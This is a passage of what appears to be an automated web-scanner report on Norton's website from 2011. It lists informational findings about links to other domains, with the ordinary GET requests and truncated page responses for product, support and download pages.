HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3123 Date: Fri, 09 Sep 2011 21:47:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36294 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Virus Removal & Malware Removal Service | NortonLive</title> <meta http-...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <noscript> <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138499&ns=1"/> </noscript><img src="http://dm.demdex.net/pixel/19701" width="0" height="0" /> <IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0" /> <img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" /> <!-- BEGIN NORTON LIVE SERVICES IMPORTS ================================== -->...[SNIP]... <li><a href="https://nortonlive.support.com/" id="myAcctBtn" target="_blank"> My Account</a>...[SNIP]... <p><a href="http://www.symantec.com/norton/support/dtree.jsp?pvid=" target="_blank"> Go To Symantec<br/>...[SNIP]... </p> <a href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss" target="_blank" class="replaced" id="chatBtn"> Chat With Us</a>...[SNIP]... 
<li><a href="http://www.symantec.com/norton/support/DIY/index.jsp" id="rsrc2" target="_blank"> DIY Resources</a>...[SNIP]... <td>Each NortonLive Service is subject to acceptance of Symantec’s <a href="http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank"> NortonLive Services Terms & Conditions</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices"> Legal Notices</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements"> License Agreements</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository"> Repository</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support"> Business Support</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales"> Business Sales</a>...[SNIP]... <li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information"> Corporate Information</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]... 
</script> <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"> </script>...[SNIP]...
14.50. http://us.norton.com/products/charts/comparison.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /products/charts/comparison.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/products/charts/comparison.jsp?pcid=mp
The response contains the following links to other domains:
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /products/charts/comparison.jsp?pcid=mp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1366 Date: Fri, 09 Sep 2011 21:47:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 73931 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Computer Security Systems | Compare Norton Products</title> <meta http-equiv="Content-Type" content="text/html; cha...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... subscription to receive virus protection and scanning engine updates. Use of this product is subject to acceptance of the Symantec License Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp"> here</a>...[SNIP]... eatures may be added, modified, or removed during the service period. Use of each product is subject to acceptance of the Symantec LLicense Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp"> here</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... 
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.51. http://us.norton.com/support/DIY/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /support/DIY/index.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools
The response contains the following links to other domains:
http://ads.bluelithium.com/pixel?id=1406631&t=2
http://bp.specificclick.net/?pixid=99068597
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138512&ns=1
http://dm.demdex.net/pixel/19701
http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/repository.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf
http://www.symantec.com/enterprise/contact_sales.jsp
http://www.symantec.com/enterprise/support/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3436 Date: Fri, 09 Sep 2011 21:47:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35700 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Free Virus Removal | Norton Power Eraser</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <noscript> <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138512&ns=1"/> </noscript> <img src="http://dm.demdex.net/pixel/19701" width="0" height="0" /> <IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0"> <IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0"> <img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" /> </div>...[SNIP]... <div id="solution_button"> <a class="button" id="download_button" onclick="javascript:trackOmnitureEvent(this, 'download_solution')" href="http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe" > <span>...[SNIP]... 
<div id="chat_button"> <a class="button" href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy" target="_blank" id="vss_chat" onclick="javascript:trackOmnitureEvent(this, 'vss_chat_link')"> <span>...[SNIP]... <div id="terms_conditions"> <a href = "http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank" id="ps_terms_conditions" onclick="javascript:trackOmnitureEvent(this, 'ps_terms_conditions')"> <div class="orangearrow">...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices"> Legal Notices</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements"> License Agreements</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository"> Repository</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support"> Business Support</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales"> Business Sales</a>...[SNIP]... <li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information"> Corporate Information</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... 
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.52. http://us.norton.com/support/dtree.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /support/dtree.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/support/dtree.jsp?pvid=
The response contains the following links to other domains:
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/repository.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/enterprise/contact_sales.jsp
http://www.symantec.com/enterprise/support/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /support/dtree.jsp?pvid= HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-Java-System-Web-Server/7.0 Location: https://www-secure.symantec.com/norton-support/index.jsp?&lg=english&ct=united+states&product=home&version=1&pvid=f-home&entsrc=redirect_pubweb Content-Type: text/html;charset=utf-8 Content-Length: 38842 Vary: Accept-Encoding Cache-Control: public, max-age=2709 Date: Fri, 09 Sep 2011 21:47:15 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Product Support ... Technical Issues | Order Status | Rebates | Norton Support</title> <meta http-equiv="Con...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <div class ="quicklink_item"> <a href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN" target="_blank" onclick="javascript:trackCustomLink(this, 'order_status')"> <img src="/content/en/us/home_homeoffice/images/support/ver1/dtree/button_orderStatus.png" border="0" height="43" width="40" />...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices"> Legal Notices</a>...[SNIP]... 
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements"> License Agreements</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository"> Repository</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support"> Business Support</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales"> Business Sales</a>...[SNIP]... <li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information"> Corporate Information</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.53. http://us.norton.com/theme.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /theme.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012
The response contains the following links to other domains:
http://www.symantec.com/
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/globalsupport
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1331 Date: Fri, 09 Sep 2011 21:47:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39140 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Introducing Norton Internet Security 2012 and Norton Antivirus 2012</title> <meta http-equiv="Content-Type" content...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... vice includes protection updates and new product features as available during the service period, subject to acceptance of the Symantec Agreement included with this product and available for review at <a href="http://www.symantec.com"> www.symantec.com</a>...[SNIP]... c provides free 24x7 email, chat and phone support for a period of one year from initial product installation. NortonLive™ Services sold separately. For full details and to access support, go to <a href="http://www.symantec.com/globalsupport"> www.symantec.com/globalsupport</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... 
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.54. http://us.norton.com/theme.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /theme.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/theme.jsp?themeid=protect_yourself
The response contains the following links to other domains:
http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget
http://www.nortoncybercrimeindex.mobi/
http://www.nortonfreetools.com/freePCCheckup/
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /theme.jsp?themeid=protect_yourself HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=3461 Date: Fri, 09 Sep 2011 21:47:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33753 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Cybercrime Index - Free Download</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <div class="mainBdyWrapBdy" style="width:308px; height: 390px;"> <a target="_blank" href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget"> <img src="/content/en/us/home_homeoffice/images/theme/cci/CCI_-NortonPageDwnLoad-GadgetAgreeBtn.jpg">...[SNIP]... <br/> <a target="_blank" href="http://www.nortoncybercrimeindex.mobi"> http://www.nortoncybercrimeindex.mobi</a>...[SNIP]... <div class="mainBdyWrapBdy" style="width:306px; height:390px;"> <a href="http://www.nortonfreetools.com/freePCCheckup/"> <img src="/content/en/us/home_homeoffice/images/theme/cci/Security-Scan-Button-blk-on-gld-303x52.jpg">...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... 
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.55. http://us.norton.com/theme4.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /theme4.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/theme4.jsp?themeid=free_tools_trials2
The response contains the following links to other domains:
http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget
http://security.symantec.com/nbrt/npe.asp?lcid=1033
http://www.facebook.com/apps/application.php?id=310877173418
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif
http://www.symantec.com/norton
http://www.symantec.com/norton/community/index.jsp
http://www.symantec.com/norton/support/index.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://security.symantec.com/sscv6/DownloadInstructions.asp
https://security.symantec.com/sscv6/WelcomePage.asp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /theme4.jsp?themeid=free_tools_trials2 HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1124 Date: Fri, 09 Sep 2011 21:47:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40638 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Download trials of Nortons Virus Protection and Spyware Remover Tools</title> <meta http-equiv="Content-Type" conte...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <br/><a href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget" target="_blank"> Try It</a>...[SNIP]... <h3><a href="https://security.symantec.com/sscv6/WelcomePage.asp"> Norton Security Scan</a>...[SNIP]... <div class="cbType22"><a href="https://security.symantec.com/sscv6/DownloadInstructions.asp" target="_blank"> Try It</a>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... 
<br/> <a href="http://security.symantec.com/nbrt/npe.asp?lcid=1033"> Try It</a>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <br /><a href="http://www.facebook.com/apps/application.php?id=310877173418" target="_blank"> Try it</a>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... 
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <li><a href="http://www.symantec.com/norton"> Norton Homepage</a>...[SNIP]... <li><a href="http://www.symantec.com/norton/community/index.jsp"> Norton Forums</a>...[SNIP]... <li><a href="http://www.symantec.com/norton/support/index.jsp"> Norton Support</a>...[SNIP]... 